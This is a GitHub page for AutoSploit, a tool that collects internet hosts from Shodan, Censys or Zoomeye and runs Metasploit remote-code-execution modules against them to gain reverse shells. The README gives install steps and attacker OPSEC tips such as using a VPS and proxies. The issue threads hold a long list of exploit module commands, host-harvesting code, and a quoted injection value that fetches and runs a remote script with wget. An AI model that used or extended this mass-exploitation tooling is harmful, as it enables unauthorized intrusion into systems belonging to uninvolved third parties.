nullarray / autosploit Goto Github PK

Automated Mass Exploiter

License: GNU General Public License v3.0

Python 93.02% Shell 5.91% Ruby 0.80% Dockerfile 0.27%

metasploit python exploit exploitation offsec automation security-tools security

autosploit's Introduction

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started

Operational Security Consideration:

Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.

The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

Helpful links

Installation

Installing AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;

Docker Compose

Using Docker Compose is by far the easiest way to get AutoSploit up and running without too much of a hassle.

git clone https://github.com/NullArray/AutoSploit.git
cd Autosploit/Docker
docker-compose run --rm autosploit

Docker

Just using Docker.

git clone https://github.com/NullArray/AutoSploit.git
cd Autosploit/Docker
# If you wish to edit default postgres service details, edit database.yml. Should work out of the box
# nano database.yml
docker network create -d bridge haknet
docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
docker build -t autosploit .
docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit

Dev team contributor Khast3x recently improved Docker operations as well as add more details to the README.md in the Docker subdirectory. For more information on deploying AutoSploit with Docker please be sure to click here

Cloning

On any Linux system the following should work;

git clone https://github.com/NullArray/AutoSploit
cd AutoSploit
chmod +x install.sh
./install.sh

AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. In order to accomplish this employ/perform the below operations via the terminal or in the form of a shell script.

sudo -s << '_EOF'
pip2 install virtualenv --user
git clone https://github.com/NullArray/AutoSploit.git
virtualenv <PATH-TO-YOUR-ENV>
source <PATH-TO-YOUR-ENV>/bin/activate
cd <PATH-TO-AUTOSPLOIT>
pip2 install -r requirements.txt
chmod +x install.sh
./install.sh
python autosploit.py
_EOF

Usage

Starting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.

1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit

Choosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I've posted the options below as well for reference.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for
                        later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 127.0.0.1
                        8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use
                        this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your
                        ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies

Note: All dependencies should be installed using the above installation method, however, if you find they are not:

AutoSploit depends on the following Python2.7 modules.

requests
psutil

Should you find you do not have these installed get them with pip like so.

pip install requests psutil

pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Acknowledgements

Special thanks to Ekultek without whoms contributions to the project, the new version would have been a lot less spectacular.

Thanks to Khast3x for setting up Docker support.

Last but certainly not least. Thanks to all who have submitted Pull Requests, bug reports, useful and productive contributions in general.

Active Development

If you would like to contribute to the development of this project please be sure to read CONTRIBUTING.md as it contains our contribution guidelines.

Please, also, be sure to read our contribution standards before sending pull requests

If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our Discord server.

Note

If you happen to encounter a bug please feel free to Open a Ticket.

Thanks in advance.

Translations

autosploit's People

Contributors

Stargazers

Watchers

Forkers

00derp 4n6strider securycore m00zh33 crypto-breaker guest20 luxame jack51706 jsklein notzippy h0ck3ystyx seangeleno alexisdanizan cephurs johnjohnsp1 shantanu561993 izogain jai6684 rvaughan olivierh59500 0x7067 mehrdad-shokri signedbytes treebuilder akilism puppycodes glennbarrett aarizkuren justinazoff victorcuralea bronx205 coolpup allanice001 yasinovskyy spdevguy w0rtw0rt saidortiz jbrashear abuadan theotherside mpbailey1911 decker-mage dezren39 mfaulk riusksk chosen1 hotelzululima sauraus viviturtle pythonone buglessdr stotch angelosk xtiankisutsa getachew arju88nair cclauss cuddycomindustries jijicanyu dr1276 wi00077 xa-bi void-in dudeedud4 3453-315h 0xlouda zcl1ax siowcy vincentswift amosshapira iacsvrn lu-chi bogdik clicknull zypan davyhua vansteki flame0 thejermy ndolle ishamfazal kzwkt ravinskiy ncrashed leewarnock oneiroi ckurlinski telmob security-geeks mmorga28 ralphschreurs83 wlasser xolodutra luciany kcsec lubyou janniskirschner gavz rootjacker nbomberger

autosploit's Issues

[Community] Installation methods

We have been discussing some installation methods to fix our rollover issue (issue #55) and have come up with a potential solution, this will bring in a problem with installation though. So we as a team have decided to give this option to the community.

First option
Create a simple installation script that will do everything with a simple command line run something like sudo bash configure.sh
Second option
Create a command that you can copy and paste that will do the installation for you something like:

sudo -s << EOF
git clone <LINK>
sudo pip2 install msgpack
cd msfrpc/python-msfrpc
python setup.py install
mkdir /opt
cd /opt
git clone autosploit
cd /opt/autosploit
pip2 install - r reqs.txt
EOF

Option three
Both.

Leave your comment here, you can also vote on our poll on Twitter or on our Discord server

Either way the configuration for the program will be done automatically, but how you want it to be done is up to you.

Add single host

i have error in here,,


[_root@autosploit# 4
------------------------------
[?] enter the host IP you wish to add: xx.xx.xx.xxx
Traceback (most recent call last):
  File "autosploit.py", line 5, in <module>
    main()
  File "/root/AutoSploit/autosploit/main.py", line 58, in main
    terminal.terminal_main_display(loaded_exploits)
  File "/root/AutoSploit/lib/term/terminal.py", line 277, in terminal_main_display
    self.add_single_host()
  File "/root/AutoSploit/lib/term/terminal.py", line 94, in add_single_host
    with open(self.host_path, "a+") as hosts:
TypeError: coercing to Unicode: need string or buffer, list found_

RHOST issue

cloned latest repo but the problem regarding RHOST remains the same as per described in earlier tickets.

Secondly, no exit path for failed exploitation as it continues to test every module on any given target of hosts.txt

Relevant modules

What ever i do
use relevant modules[y/N]: Y or N
it starts using all the modules in the database

[?] specify full path to a whitelist file, otherwise hit enter:
[+] you will need to do some configuration to MSF.
please keep in mind that sending connections back to your local host is probably not a smart idea.
[?] enter your workspace name: root
[?] enter your LHOST: 192.168.1.1
[?] enter your LPORT: 4444
[?] a total of 9 modules have been sorted by relevance, would you like to display them[y/N]: y
exploit/unix/webapp/joomla_contenthistory_sqli_rce
exploit/multi/http/joomla_http_header_rce
exploit/multi/http/joomla_http_header_rce
exploit/unix/webapp/joomla_akeeba_unserialize
exploit/unix/webapp/joomla_comjce_imgmanager
exploit/unix/webapp/joomla_contenthistory_sqli_rce
exploit/unix/webapp/joomla_media_upload_exec
exploit/multi/http/joomla_http_header_rce
exploit/unix/webapp/joomla_contenthistory_sqli_rce
[?] use relevant modules[y/N]: y
[+] starting exploitation with sorted modules (total of 9)
[+] launching exploit 'exploit/windows/ftp/ms09_053_ftpd_nlst' against host '192.168.1.4'

How can i selesc to use just one single module?

Fail to gather hosts

Usind Autosploit under recent Kali/Linux I get the following error when searching for hosts with shodan:
`Traceback` (most recent call last):'plex'... File "autosploit.py", line 5, in <module> main() File "/root/AutoSploit/autosploit/main.py", line 50, in main AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits) File "/root/AutoSploit/lib/cmdline/cmd.py", line 147, in single_run_args keys["shodan"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] File "/root/AutoSploit/api_calls/shodan.py", line 44, in shodan raise AutoSploitAPIConnectionError(str(e)) lib.errors.AutoSploitAPIConnectionError: 'matches'
Any Ideas how I could fix that?

My AutoSploit was cloned from github.

RHOSTS Error FIX

Change RHOSTS to RHOST

censys API Error

Could someone give a sample of Censys API Token and Censys ID? I tried to use API Credentials under the censys.io My Account option, but it showed error as following:

File "autosploit.py", line 5, in
main()
File "/opt/AutoSploit/autosploit/main.py", line 50, in main
AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits)
File "/opt/AutoSploit/lib/cmdline/cmd.py", line 137, in single_run_args
opt.searchQuery, proxy=headers[0], agent=headers[1]
File "/opt/AutoSploit/api_calls/censys.py", line 44, in censys
raise AutoSploitAPIConnectionError(str(e))
lib.errors.AutoSploitAPIConnectionError: 'results'

Thanks.

The search request timed out.

after selecting 2nd option the below error raised

[!]Critical. An error was raised with the following error message.

The search request timed out.

Error in python3 tryes to start in python2 shows this

Python version number (2.7..)
AutoSploit version number (2.0)
Traceback (error) if any:

root@KALI:~/Desktop/AutoSploit-2.0# python autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/root/Desktop/AutoSploit-2.0/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/root/Desktop/AutoSploit-2.0/lib/cmdline/cmd.py", line 9, in
import api_calls.censys
File "/root/Desktop/AutoSploit-2.0/api_calls/censys.py", line 1, in
import requests
File "/usr/local/lib/python2.7/dist-packages/requests/init.py", line 84, in
from urllib3.contrib import pyopenssl
File "/usr/local/lib/python2.7/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in
import OpenSSL.SSL
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/init.py", line 8, in
from OpenSSL import rand, crypto, SSL
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 12, in
from cryptography import x509
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/init.py", line 8, in
from cryptography.x509.base import (
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/base.py", line 16, in
from cryptography.x509.extensions import Extension, ExtensionType
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/extensions.py", line 24, in
from cryptography.x509.general_name import GeneralName, IPAddress, OtherName
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/general_name.py", line 18, in
from cryptography.x509.name import Name
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/name.py", line 28, in
_ASN1_TYPE_TO_ENUM = dict((i.value, i) for i in _ASN1Type)
TypeError: 'type' object is not iterable

Notifying User of External Exploits

Is it possible to notify users of a vulnerability that doesn’t have a public exploit (cvedetails.com, cve.mitre.org) and also if there’s an exploit that’s public but that’s not in the MSF (exploit-db.com) so users can add it to MSF.

Stupid Idea I have

What about giving a web interface for this project, so it could be launched via the internet? I have some free servers if they would help?

error invalid api key

good day.i successfully setup the tool an installed all dependencies smoothly.i also registered in shodan and collected my api key. when i put the api key ,it registers ok. when i select option 2 gather, it generates this error [!]Critical. An error was raised with the following error message.

Invalid API key
. any solutions.thanks

Syntax issue

Am getting this after "python autosploit.py"

File "autosploit.py", line 24
print t.cyan("""
^
SyntaxError: invalid syntax

Services

[←[1m←[32m+←[0m] checking for services
Traceback (most recent call last):
  File "autosploit.py", line 5, in <module>
    main()
  File "C:\Users\Nick\AutoSploit\autosploit\main.py", line 32, in main
    if not check_services(service):
  File "C:\Users\Nick\AutoSploit\lib\settings.py", line 94, in check_services
    all_processes.add(" ".join(running_proc.cmdline()).strip())
  File "C:\Python27\lib\site-packages\psutil\__init__.py", line 712, in cmdline
    return self._proc.cmdline()
  File "C:\Python27\lib\site-packages\psutil\_pswindows.py", line 639, in wrapper
    raise AccessDenied(self.pid, self._name)
psutil.AccessDenied: psutil.AccessDenied (pid=312)

Privately reported

Pauses on each failed eploit

Is there a way to automate the rollover to the next exploit when one fails? Right now that part of this tool is not very auto, unless I'm missing something.

[Not an issue] Question; what are you all using to search?

The default suggestion is 'IIS', I'm just curious what others are searching for via shodan.

@NullArray if you don't want this here, feel free to remove it.

Shodan API

I have run shodan init and even tried to put the api key into the autosploit.py file but i still get the following error:

[+]Please stand by while results are being collected...

[!]Critical. An error was raised with the following error message.

Invalid API key

Not hate mail.

You realize you just opened Pandora’s box on every able body in the world right? I love it, keep it up man.

test issue

Running information

What branch did you download? test
Clone, or docker run? test
What OS are you running? test

Exploit module information

What exploit was deployed? test
Was a session generated for the target? test
What version of metasploit are you running? test

Program information

Python version number? test
AutoSploit version number? test
Any console output that is relevant to the issue: test
Traceback (error) if any:

Implement Censys

We should also implement a search on censys.io along with the ability to search shodan.

For example; we can give the ability to search one, or both by passing flags to the program. Core functionality will be left alone, this way we can still have that autosploitable feel to it

README translations

We need some README translations, if you know another language and the translation is not already in here, and you feel like being my hero, go ahead and make a pull request for one.

Translations need to follow the guidelines below;

Must be fully translated
Must add a link to your translation in the current README here
Must be merged into the dev-beta branch

Get to it guys!

[Request] zoomeye.org

Can you please add support for https://www.zoomeye.org/ alongside Shodan.io.
Thanks

Same IP address twice causes error

File "autosploit.py", line 5, in
main()
File "/opt/metasploit-framework/Autosploit/autosploit/main.py", line 78, in main
AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits)
File "/opt/metasploit-framework/Autosploit/lib/cmdline/cmd.py", line 174, in single_run_args
msf_path=opt.pathToFramework
File "/opt/metasploit-framework/Autosploit/lib/exploitation/exploiter.py", line 87, in start_exploit
makedirs(current_host_path)
File "/usr/lib/python2.7/os.py", line 157, in makedirs
mkdir(name, mode)
OSError: [Errno 17] File exists: '/opt/metasploit-framework/Autosploit/autosploit_out/2018-04-06_18h21m40s/192.168.1.7'

Traceback issue

I have clone AutoSploit on termux (Android nougat 7.0) ; the clone have been successful but when I put
python autosploit.py
and I press enter it lauch a while and show me 3 bugs:
file /data/data/com.termux/files/home/AutoSploit/autosploit.py line 10 main in

file /data/data/com.termux/files/home/AutoSploit/lib/autoput.py raw_input (NameError :raw_input not defined)

file /data/data/com.termux/files/home/AutoSploit/main.py choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]")

Add option to supply custom host list.

It would be a good idea to add an option to load in a custom host list. Also some improvements with regards to rollover might be prudent. When an exploit fails, it is desirable that the tool automatically continues with it's normal operation.

View Gathered Hosts

Running information

Clone
Kali Linux 2.0

Exploit module information

Program information

Python 2.7.14
AutoSploit 2.0
File "autosploit.py", line 5, in
main()
File "/root/AutoSploit/autosploit/main.py", line 58, in main
terminal.terminal_main_display(loaded_exploits)
File "/root/AutoSploit/lib/term/terminal.py", line 273, in terminal_main_display
self.view_gathered_hosts()
File "/root/AutoSploit/lib/term/terminal.py", line 73, in view_gathered_hosts
with open(self.host_path) as hosts:
TypeError: coercing to Unicode: need string or buffer, list found

when I try ask for the gathered hosts it produces a list and fails

The standard

I think, it will be useful to add small programming style convention document for contributors.
Such as:

UpperCamelCase for classes and snake_case for functions
Upper case for constants
from foo import * are forbidden. Import all the modules between parentheses.

#optional

global variables are forbidden
files longer than NUM lines are not allowed - try to manage your code between small modules.
OOP is strongly recommended

etc

RHOST Solution

Why not set both RHOST = ip, and RHOSTS = ip ?

thx

MSF is not in your PATH

Running information

Clone
Kali 2.0

Exploit module information

N/A
No Session?
metasploit v4.16.43-dev

Program information

Python 2.7
AutoSploit 2.0
Ruby: Is a directory -- /usr/bin/ (LoadError)

Do I maybe have the wrong directory for msfconsole?

Unable to validate Rhost

[-] Exploit failed: The following options failed to validate: RHOST.

Exploit is getting failed due to Rhost, When i set the Rhost manually its working fine.

Security issue with os.system call

The os.system call does not properly sanitize input collected from Shodan.

Its likely SHODAN isn't going to do something bad, but in the unlikely event the API is compromised or someone wants to cause harm, the os.system calls should be properly sanitized or passed to subprocess.Popen without shell=true. Example: ip=; wget badsite.com/badcode.sh|bash;

Fix rollover on failed exploit.

We need to gracefully handle exploit failures in order to facilitate proper rollover to the next one. Since we wish to automate as much as possible, it is important to handle exploits failures in an automated manner as well. Some tools that automate MSF functionality do so by employing msfrpc. I'll be looking into a way of implementing similar measures as a fix to this issue.

[Request] Custom Payloads

Can you please add an option to use a custom payload instead.
Thanks

New installation method for PostgreSQL on macOS systems

If you look here: https://github.com/NullArray/AutoSploit/blob/dev-beta/etc/scripts/start_services.sh#L16 you'll notice that brew is used. AutoSploit requires (on most devices) the user to run as root.Brew is designed by default to not run as root, as to not break macOS built-in integrity protection (because Apple likes to be difficult as fuck). If anybody has another installation method on how to get PostgreSQL downloaded and run onto the users system during the installation it would be greatly appreciated!

Creating First Release

I think it’s time to create v1.0 release on GitHub

Running successful connections in the background

reference: https://www.hacking-tutorial.com/tips-and-trick/7-metasploit-meterpreter-core-commands-you-should-know/

Service names

Change Apache to apache2 that way it will be defiant to pick it up

https://github.com/NullArray/AutoSploit/blob/master/autosploit/main.py#L30

Program arguments to be implemented

A list of arguments that we should be able to pass:

~~-ip provide a specific IP addr to exploit~~
-C scan censys instead of Shodan, Shodan will be default
—both scan both Shodan and Censys
—proxy run behind a proxy, we don’t need to implement a Tor flag if we use this
~~-e provide a text file containing user provided exploits, it will be saved into a JSON file for future use~~
-E provide a specific exploit to use (if it fails we can either exit or continue)
~~—ethics display #6 :)~~

The goal is to use the arguments, and go to the core functionality we have now if no arguments are passed

I’ll add more when I think of things that will be useful, ideas are welcomed

Void shodan library

Would it be an issue to create your own shodan library for this, something along the lines of:

import json
import time
import threading
import base64

import requests

import lib.settings
import lib.output


def get_token(encoded):
    encoded = encoded.strip()
    token, n = encoded.split(":")
    for _ in range(int(n)):
        token = base64.b64decode(token)
    return token


def gather_hosts(query):
    discovered = set()

    try:
        animation_text = "gathering hosts relevant to query {}...".format(query)
        t = threading.Thread(target=lib.settings.animation, args=(animation_text,))
        t.daemon = True
        t.start()

        token = get_token(open(lib.settings.TOKEN_PATH).read())
        req = requests.get(lib.settings.SHODAN_API_LINK.format(key=token, query=query))
        data = json.loads(req.content)
        for match in data["matches"]:
            discovered.add(match["ip_str"])
        file_path = "{}/hosts.lst".format(lib.settings.GATHERED_HOSTS_PATH)
        lib.settings.write_to_file(discovered, file_path)
        output_text = "done, successfully gathered {} hosts".format(len(discovered))
        padding_needed = len(animation_text) - len(output_text)
        lib.output.info(output_text + "{}".format(" " * padding_needed))
        lib.settings.STOP_ANIMATION = True
        return file_path
    except Exception as e:
        lib.output.error("caught exception '{}' while gathering hosts".format(str(e)))
        lib.settings.shutdown()


def view_gathered_hosts(host_file):
    with open(host_file) as hosts:
        for i, host in enumerate(hosts, start=1):
            lib.output.info("[{}] {}".format(i, host.strip()))
    return

That should grab at least 100 IP addresses from shodan

Invalid API key

I have a REAL dumbass NOOB question.

Getting the following error.

#--Author : Vector/NullArray | _ |_ | | | || ||| |_
#--Twitter: @Real__Vector | | | | | . |_ | . | | . | | |
#--Type : Mass Exploiter ||||| ||| |||||
#--Version: 1.0.0 |_|
##############################################

[+]Please provide your platform specific search query.
[+]I.E. 'IIS' will return a list of IPs belonging to IIS servers.

$ IIS
[+]Please stand by while results are being collected...

[!]Critical. An error was raised with the following error message.

Invalid API key
root@kl01:~/apps/AutoSploit#

Thoughts?
TIA!!!

[!] Unhandled Option.

getting while trying to gather hosts from shodan. not searching, not creating hosts.txt

JSON file for modules

Implement JSON format for the modules over text files:

{
  "defaults": [
     "use exploit/windows/firewall/blackice_pam_icq; exploit -j;",
     "use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j;",
     "use exploit/windows/http/amlibweb_webquerydll_app;exploit -j;",
     "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
     "use exploit/windows/http/umbraco_upload_aspx;exploit -j;",
     "use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j;",
     "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
     "use exploit/windows/iis/ms01_023_printer;exploit -j;",
     "use exploit/windows/iis/ms01_026_dbldecode;exploit -j;",
     "use exploit/windows/iis/ms01_033_idq;exploit -j;",
     "use exploit/windows/iis/ms02_018_htr;exploit -j;",
     "use exploit/windows/iis/ms02_065_msadc;exploit -j;",
     "use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j;",
     "use exploit/windows/iis/msadc;exploit -j;",
     "use exploit/windows/isapi/ms00_094_pbserver;exploit -j;",
     "use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j;",
     "use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j;",
     "use exploit/windows/isapi/rsa_webagent_redirect;exploit -j;",
     "use exploit/windows/isapi/w3who_query;exploit -j;",
     "use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j;",
     "use exploit/windows/ssl/ms04_011_pct;exploit -j;",
     "use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; ",
     "use exploit/linux/http/alienvault_exec;exploit -j; ",
     "use exploit/linux/http/alienvault_sqli_exec;exploit -j; ",
     "use exploit/linux/http/astium_sqli_upload;exploit -j; ",
     "use exploit/linux/http/centreon_sqli_exec;exploit -j; ",
     "use exploit/linux/http/centreon_useralias_exec;exploit -j; ",
     "use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; ",
     "use exploit/linux/http/dolibarr_cmd_exec;exploit -j; ",
     "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
     "use exploit/linux/http/kloxo_sqli;exploit -j; ",
     "use exploit/linux/http/nagios_xi_chained_rce;exploit -j; ",
     "use exploit/linux/http/netgear_wnr2000_rce;exploit -j; ",
     "use exploit/linux/http/pandora_fms_sqli;exploit -j; ",
     "use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; ",
     "use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; ",
     "use exploit/linux/http/zabbix_sqli;exploit -j; ",
     "use exploit/linux/misc/qnap_transcode_server;exploit -j; ",
     "use exploit/linux/mysql/mysql_yassl_getname;exploit -j; ",
     "use exploit/linux/mysql/mysql_yassl_hello;exploit -j; ",
     "use exploit/linux/postgres/postgres_payload;exploit -j; ",
     "use exploit/linux/samba/is_known_pipename;exploit -j; ",
     "use exploit/multi/browser/java_jre17_driver_manager;exploit -j; ",
     "use exploit/multi/http/atutor_sqli;exploit -j; ",
     "use exploit/multi/http/dexter_casinoloader_exec;exploit -j; ",
     "use exploit/multi/http/drupal_drupageddon;exploit -j; ",
     "use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; ",
     "use exploit/multi/http/manageengine_search_sqli;exploit -j; ",
     "use exploit/multi/http/movabletype_upgrade_exec;exploit -j; ",
     "use exploit/multi/http/php_volunteer_upload_exe;exploit -j; ",
     "use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; ",
     "use exploit/multi/http/splunk_mappy_exec;exploit -j; ",
     "use exploit/multi/http/testlink_upload_exec;exploit -j; ",
     "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; ",
     "use exploit/multi/misc/legend_bot_exec;exploit -j; ",
     "use exploit/multi/mysql/mysql_udf_payload;exploit -j; ",
     "use exploit/multi/postgres/postgres_createlang;exploit -j; ",
     "use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; ",
     "use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; ",
     "use exploit/unix/http/tnftp_savefile;exploit -j; ",
     "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; ",
     "use exploit/unix/webapp/kimai_sqli;exploit -j; ",
     "use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; ",
     "use exploit/unix/webapp/seportal_sqli_exec;exploit -j; ",
     "use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; ",
     "use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j;",
     "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; ",
     "use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; ",
     "use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j;",
     "use exploit/windows/http/cyclope_ess_sqli;exploit -j;",
     "use exploit/windows/http/hp_mpa_job_acct;exploit -j;",
     "use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j;",
     "use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j;",
     "use exploit/windows/misc/altiris_ds_sqli;exploit -j; ",
     "use exploit/windows/misc/fb_cnct_group;exploit -j; ",
     "use exploit/windows/misc/lianja_db_net;exploit -j; ",
     "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; ",
     "use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; ",
     "use exploit/windows/mssql/ms02_039_slammer;exploit -j; ",
     "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; ",
     "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; ",
     "use exploit/windows/mssql/mssql_linkcrawler;exploit -j; ",
     "use exploit/windows/mssql/mssql_payload;exploit -j; ",
     "use exploit/windows/mssql/mssql_payload_sqli;exploit -j; ",
     "use exploit/windows/mysql/mysql_mof;exploit -j; ",
     "use exploit/windows/mysql/mysql_start_up;exploit -j; ",
     "use exploit/windows/mysql/mysql_yassl_hello;exploit -j;",
     "use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; ",
     "use exploit/windows/postgres/postgres_payload;exploit -j; ",
     "use exploit/windows/scada/realwin_on_fcs_login;exploit -j;",
     "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
     "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
     "use exploit/multi/http/rails_json_yaml_code_exec;exploit -j;",
     "use exploit/multi/http/rails_secret_deserialization;exploit -j;",
     "use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j;",
     "use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j;",
     "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
     "use exploit/multi/http/phpmoadmin_exec;exploit -j;",
     "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
     "use exploit/multi/http/phpmyadmin_preg_replace;exploit -j;",
     "use exploit/multi/http/phpscheduleit_start_date;exploit -j;",
     "use exploit/multi/http/phptax_exec;exploit -j;",
     "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
     "use exploit/multi/http/plone_popen2;exploit -j;",
     "use exploit/multi/http/pmwiki_pagelist;exploit -j;",
     "use exploit/multi/http/joomla_http_header_rce;exploit -j;",
     "use exploit/multi/http/novell_servicedesk_rce;exploit -j;",
     "use exploit/multi/http/oracle_reports_rce;exploit -j;",
     "use exploit/multi/http/php_utility_belt_rce;exploit -j;",
     "use exploit/multi/http/phpfilemanager_rce;exploit -j;",
     "use exploit/multi/http/processmaker_exec;exploit -j;",
     "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
     "use exploit/multi/http/spree_search_exec;exploit -j;",
     "use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
     "use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
     "use exploit/multi/http/vtiger_install_rce;exploit -j;",
     "use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
     "use exploit/multi/http/zemra_panel_rce;exploit -j;",
     "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
     "use exploit/multi/http/joomla_http_header_rce;exploit -j;",
     "use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j;",
     "use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j;",
     "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
     "use exploit/unix/webapp/joomla_media_upload_exec;exploit -j;",
     "use exploit/multi/http/builderengine_upload_exec;exploit -j;",
     "use exploit/multi/http/caidao_php_backdoor_exec;exploit -j;",
     "use exploit/multi/http/atutor_sqli;exploit -j; ",
     "use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j;",
     "use exploit/multi/http/apache_activemq_upload_jsp;exploit -j;  ",
     "use exploit/unix/webapp/wp_lastpost_exec;exploit -j;  ",
     "use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j;",
     "use exploit/multi/http/axis2_deployer;exploit -j;",
     "use exploit/unix/webapp/wp_foxypress_upload;exploit -j;",
     "use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j;",
     "use exploit/linux/misc/quest_pmmasterd_bof;exploit -j;",
     "use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j;",
     "use exploit/unix/webapp/php_xmlrpc_eval;exploit -j;",
     "use exploit/unix/webapp/wp_admin_shell_upload;exploit -j;",
     "use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j;",
     "use exploit/linux/local/sophos_wpa_clear_keys;exploit -j;",
     "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
     "use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j;",
     "use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j;",
     "use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j;",
